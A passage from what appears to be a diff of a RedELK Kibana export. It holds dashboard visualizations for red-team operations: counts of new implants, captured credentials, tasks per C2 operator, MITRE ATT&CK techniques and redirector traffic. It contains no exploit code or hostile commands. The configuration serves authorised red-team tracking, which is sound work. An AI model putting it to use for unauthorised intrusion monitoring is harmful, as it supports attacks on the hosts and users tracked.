Downloads over time", - "type": "histogram" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "85446c80-d04b-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 151 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "c2.log.type", - "negate": false, - "params": { - "query": "implant_newimplant" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "c2.log.type": "implant_newimplant" - } - } - } - ], - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "" - } - } - }, - "title": "RedELK - Top new implants by ext IP address and scenario", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Amount of new implants" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "customLabel": "Redirector IP", - "field": "host.ip_ext", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 20 - }, - "schema": "segment", - "type": "terms" - }, - { - "enabled": true, - "id": "3", - "params": { - "customLabel": "Scenario", - "field": "infra.attack_scenario", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 5 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTooltip": true, - "distinctColors": true, - "isDonut": false, - "labels": { - "last_level": false, - "show": true, - "truncate": 100, - "values": true - }, - "legendPosition": "top", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "type": "pie" - }, - "title": "RedELK - Top new implants by ext IP address and scenario", - "type": "pie" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171875895, - 154 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - TTP Cloud Tag", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "IDs" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "customLabel": "TTP", - "field": "threat.technique.id", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other TTPs", - "size": 100 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "maxFontSize": 72, - "minFontSize": 18, - "orientation": "single", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "scale": "linear", - "showLabel": false - }, - "title": "RedELK - TTP Cloud Tag", - "type": "tagcloud" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "88db1280-d024-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "cc523820-d021-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 156 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "c2.log.type: \"implant_newimplant\" AND (NOT tags: testsystems_V* )" - } - } - }, - "title": "RedELK - Top users with new implants", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "user.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 20 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTooltip": false, - "distinctColors": true, - "isDonut": true, - "labels": { - "last_level": true, - "show": true, - "truncate": 100, - "values": true - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "type": "pie" - }, - "title": "RedELK - Top users with new implants", - "type": "pie" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171875895, - 158 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Tasks per host and user", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "3", - "params": { - "field": "user.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other users", - "size": 100 - }, - "schema": "segment", - "type": "terms" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "host.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other hosts", - "size": 100 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTooltip": true, - "distinctColors": true, - "isDonut": true, - "labels": { - "last_level": true, - "show": false, - "truncate": 100, - "values": true - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "type": "pie" - }, - "title": "RedELK - Tasks per host and user", - "type": "pie" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "a5554e20-d025-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "cc523820-d021-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 160 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Credentials over time", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Credentials captured" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "drop_partials": false, - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1, - "scaleMetricValues": false, - "timeRange": { - "from": "now-30d", - "to": "now" - }, - "useNormalizedEsInterval": true - }, - "schema": "segment", - "type": "date_histogram" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": true, - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "grid": { - "categoryLines": false - }, - "isVislibVis": true, - "labels": { - "show": false - }, - "legendPosition": "bottom", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Credentials captured" - }, - "drawLinesBetweenPoints": true, - "lineWidth": 2, - "mode": "stacked", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "thresholdLine": { - "color": "#E7664C", - "show": false, - "style": "full", - "value": 10, - "width": 1 - }, - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Credentials captured" - }, - "type": "value" - } - ] - }, - "title": "RedELK - Credentials over time", - "type": "histogram" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "ab609c60-d319-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "3fabe620-6c38-11ea-97d6-55783aed877a", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 162 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - MITRE ATT&CK Techniques tag cloud", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "signal.rule.threat.technique.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 300 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "maxFontSize": 58, - "minFontSize": 14, - "orientation": "single", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "scale": "linear", - "showLabel": false - }, - "title": "RedELK - MITRE ATT&CK Techniques tag cloud", - "type": "tagcloud" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "abdcd940-d050-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 164 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Tasks per C2 operator", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Tasks launched" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "drop_partials": false, - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1, - "scaleMetricValues": false, - "timeRange": { - "from": "now-1d", - "to": "now" - }, - "useNormalizedEsInterval": true - }, - "schema": "segment", - "type": "date_histogram" - }, - { - "enabled": true, - "id": "3", - "params": { - "field": "user.name", - "missingBucket": true, - "missingBucketLabel": "Unknown user", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 10 - }, - "schema": "group", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": true, - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "grid": { - "categoryLines": false - }, - "isVislibVis": true, - "labels": { - "show": false - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Tasks launched" - }, - "drawLinesBetweenPoints": true, - "lineWidth": 2, - "mode": "stacked", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "thresholdLine": { - "color": "#E7664C", - "show": false, - "style": "full", - "value": 10, - "width": 1 - }, - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Tasks launched" - }, - "type": "value" - } - ] - }, - "title": "RedELK - Tasks launched per operator", - "type": "histogram" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "cc523820-d021-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 166 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Hosts total unique count", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "2", - "params": { - "customLabel": "Hosts", - "field": "host.name" - }, - "schema": "metric", - "type": "cardinality" - } - ], - "params": { - "addLegend": false, - "addTooltip": true, - "metric": { - "colorSchema": "Green to Red", - "colorsRange": [ - { - "from": 0, - "to": 10000 - } - ], - "invertColors": false, - "labels": { - "show": true - }, - "metricColorMode": "None", - "percentageMode": false, - "style": { - "bgColor": false, - "bgFill": "#000", - "fontSize": 60, - "labelColor": false, - "subText": "" - }, - "useRanges": false - }, - "type": "metric" - }, - "title": "RedELK - Hosts total unique count", - "type": "metric" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 168 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Downloads total count", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Downloads" - }, - "schema": "metric", - "type": "count" - } - ], - "params": { - "addLegend": false, - "addTooltip": true, - "metric": { - "colorSchema": "Green to Red", - "colorsRange": [ - { - "from": 0, - "to": 10000 - } - ], - "invertColors": false, - "labels": { - "show": true - }, - "metricColorMode": "None", - "percentageMode": false, - "style": { - "bgColor": false, - "bgFill": "#000", - "fontSize": 60, - "labelColor": false, - "subText": "" - }, - "useRanges": false - }, - "type": "metric" - }, - "title": "RedELK - CS - Downloads total count", - "type": "metric" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 170 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - HTTP Redir traffic over time", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "redir.backend.name : c2* and tags : \"iplist_customer\"" - }, - "label": "C2 traffic - Customer" - }, - { - "input": { - "language": "kuery", - "query": "redir.backend.name : c2* and tags : \"iplist_redteam\" " - }, - "label": "C2 traffic - Red team tests" - }, - { - "input": { - "language": "kuery", - "query": "redir.backend.name : c2* and not tags: \"iplist_customer\" and not tags : \"iplist_redteam\" " - }, - "label": "C2 traffic - Other" - }, - { - "input": { - "language": "kuery", - "query": "not redir.backend.name : c2*" - }, - "label": "Non-C2 traffic" - } - ] - }, - "schema": "group", - "type": "filters" - }, - { - "enabled": true, - "id": "3", - "params": { - "drop_partials": false, - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1, - "scaleMetricValues": false, - "timeRange": { - "from": "now-1w", - "to": "now" - }, - "useNormalizedEsInterval": true - }, - "schema": "segment", - "type": "date_histogram" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": true, - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "fittingFunction": "linear", - "grid": { - "categoryLines": false - }, - "isVislibVis": true, - "labels": {}, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Count" - }, - "drawLinesBetweenPoints": true, - "interpolate": "linear", - "lineWidth": 2, - "mode": "normal", - "show": true, - "showCircles": true, - "type": "line", - "valueAxis": "ValueAxis-1" - } - ], - "thresholdLine": { - "color": "#E7664C", - "show": false, - "style": "full", - "value": 10, - "width": 1 - }, - "times": [], - "type": "line", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Count" - }, - "type": "value" - } - ] - }, - "title": "RedELK - HTTP Redir traffic over time", - "type": "line" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "be08d380-efe9-11eb-8a9f-2572da287875", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 172 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - HTTP Redir traffic source table", - "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Hits" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "customLabel": "Source IP", - "field": "source.ip", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 100 - }, - "schema": "bucket", - "type": "terms" - }, - { - "enabled": true, - "id": "3", - "params": { - "customLabel": "AS Organisation", - "field": "source.as.organization.name", - "missingBucket": true, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 1 - }, - "schema": "bucket", - "type": "terms" - }, - { - "enabled": true, - "id": "4", - "params": { - "customLabel": "Country", - "field": "source.geo.country_iso_code", - "missingBucket": true, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 1 - }, - "schema": "bucket", - "type": "terms" - } - ], - "params": { - "perPage": 10, - "percentageCol": "Hits", - "showMetricsAtAllLevels": false, - "showPartialRows": true, - "showToolbar": true, - "showTotal": true, - "sort": { - "columnIndex": null, - "direction": null - }, - "totalFunc": "sum" - }, - "title": "RedELK - HTTP Redir traffic source table", - "type": "table" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "cbb7d710-efee-11eb-8a9f-2572da287875", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 174 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Tasks execution timeframe", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "First task", - "field": "@timestamp" - }, - "schema": "metric", - "type": "min" - }, - { - "enabled": true, - "id": "2", - "params": { - "customLabel": "Last task", - "field": "@timestamp" - }, - "schema": "metric", - "type": "max" - } - ], - "params": { - "addLegend": false, - "addTooltip": true, - "metric": { - "colorSchema": "Green to Red", - "colorsRange": [ - { - "from": 0, - "to": 10000 - } - ], - "invertColors": false, - "labels": { - "show": true - }, - "metricColorMode": "None", - "percentageMode": false, - "style": { - "bgColor": false, - "bgFill": "#000", - "fontSize": 24, - "labelColor": false, - "subText": "" - }, - "useRanges": false - }, - "type": "metric" - }, - "title": "RedELK - Tasks execution timeframe", - "type": "metric" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "ce581930-d361-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "cc523820-d021-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 176 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "title": "RedELK - Target host and user selector", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [], - "params": { - "controls": [ - { - "fieldName": "host.name", - "id": "1595867425052", - "indexPatternRefName": "control_0_index_pattern", - "label": "Target host(s)", - "options": { - "dynamicOptions": true, - "multiselect": true, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" - }, - { - "fieldName": "user.name", - "id": "1595867451919", - "indexPatternRefName": "control_1_index_pattern", - "label": "Target user(s)", - "options": { - "dynamicOptions": true, - "multiselect": true, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" - } - ], - "pinFilters": false, - "updateFiltersOnChange": true, - "useTimeFilter": false - }, - "title": "RedELK - Target host and user selector", - "type": "input_control_vis" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "rtops", - "name": "control_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "control_1_index_pattern", - "type": "index-pattern" - } - ], - "sort": [ - 1642171875895, - 179 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - HTTP Redir traffic per backend", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "redir.backend.name : c2*" - }, - "label": "C2 traffic" - }, - { - "input": { - "language": "kuery", - "query": "not redir.backend.name : c2*" - }, - "label": "Non-C2 traffic" - } - ] - }, - "schema": "segment", - "type": "filters" - }, - { - "enabled": true, - "id": "3", - "params": { - "customLabel": "Backend", - "field": "redir.backend.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 20 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTooltip": true, - "distinctColors": true, - "isDonut": true, - "labels": { - "last_level": true, - "show": false, - "truncate": 100, - "values": true - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "type": "pie" - }, - "title": "RedELK - HTTP Redir traffic per backend", - "type": "pie" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "d625ba60-efe8-11eb-8a9f-2572da287875", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 181 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Credentials total count", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Credentials" - }, - "schema": "metric", - "type": "count" - } - ], - "params": { - "addLegend": false, - "addTooltip": true, - "metric": { - "colorSchema": "Green to Red", - "colorsRange": [ - { - "from": 0, - "to": 10000 - } - ], - "invertColors": false, - "labels": { - "show": true - }, - "metricColorMode": "None", - "percentageMode": false, - "style": { - "bgColor": false, - "bgFill": "#000", - "fontSize": 60, - "labelColor": false, - "subText": "" - }, - "useRanges": false - }, - "type": "metric" - }, - "title": "RedELK - Credentials total count", - "type": "metric" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "dcf86190-d319-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "3fabe620-6c38-11ea-97d6-55783aed877a", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 183 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "c2.log.type: implant_newimplant" - } - } - }, - "title": "RedELK - New implants over time", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Amount of implants" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1 - }, - "schema": "segment", - "type": "date_histogram" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": true, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "fittingFunction": "linear", - "grid": { - "categoryLines": true, - "style": { - "color": "#eee" - }, - "valueAxis": null - }, - "isVislibVis": true, - "legendPosition": "top", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Amount of implants" - }, - "drawLinesBetweenPoints": true, - "interpolate": "linear", - "lineWidth": 5, - "mode": "stacked", - "show": "true", - "showCircles": true, - "type": "line", - "valueAxis": "ValueAxis-1" - } - ], - "times": [], - "type": "line", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Amount of implants" - }, - "type": "value" - } - ] - }, - "title": "New implants over time", - "type": "line" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171875895, - 185 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "" - } - } - }, - "title": "RedELK - Redirector Traffic All", - "uiStateJSON": "{\"mapCenter\":[20.96143961409684,13.007096309476236],\"mapZoom\":2}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Source IP", - "field": "source.ip" - }, - "schema": "metric", - "type": "cardinality" - }, - { - "enabled": true, - "id": "2", - "params": { - "autoPrecision": true, - "customLabel": "", - "field": "source.geo.location", - "isFilteredByCollar": true, - "precision": 2, - "useGeocentroid": true - }, - "schema": "segment", - "type": "geohash_grid" - } - ], - "params": { - "addTooltip": true, - "colorSchema": "Blues", - "heatClusterSize": 1.5, - "isDesaturated": true, - "legendPosition": "bottomright", - "mapCenter": [ - 0, - 0 - ], - "mapType": "Heatmap", - "mapZoom": 2, - "wms": { - "baseLayersAreLoaded": {}, - "enabled": false, - "options": { - "format": "image/png", - "transparent": true - }, - "selectedTmsLayer": { - "attribution": "

